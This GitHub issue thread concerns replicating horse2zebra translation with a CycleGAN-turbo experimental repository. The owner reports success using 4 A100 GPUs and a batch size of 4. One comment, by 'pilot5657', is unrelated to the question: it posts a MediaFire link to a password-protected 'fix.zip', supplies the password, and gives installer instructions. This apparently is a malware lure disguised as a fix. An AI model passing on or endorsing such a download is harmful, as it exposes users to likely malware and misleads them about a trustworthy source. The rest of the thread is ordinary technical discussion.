### ISSUE TITLE
Unable to Achieve horse2zebra Translation - Seeking Advice

### ISSUE THREAD

**Issue by Yuxinn-J** [Tugapi/CycleGAN-turbo-experiment#1]
Hi really interesting attempt! 

I recently attempted to replicate the horse2zebra translation using the official codebase. After debugging, I was still unable to obtain decent results, as the outputs only show reconstruction rather than the expected translation.

Could I ask if you successfully replicated the results using this code? 

Thank you for your help!

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tugapi** [comment]
I have successfully reproduce the  horse2zebra task.

**Comment by Yuxinn-J** [comment]
Wow, that’s great! Would you suggest starting with your `train_CycleGAN_turbo.py` code? Also, how many GPUs and what batch size did you use with [your default settings](https://github.com/Tugapi/CycleGAN-turbo-experiment/blob/4eae80f7c919f0adf049a91b669720353bcb1999/utils/training_utils.py#L148)? Thanks :)

**Comment by Tugapi** [comment]
Yes. And I use 4 A100 GPUs with a batch size of 4.

**Comment by Yuxinn-J** [comment]
Great! I’ll give it a try myself. Thanks so much for your help!
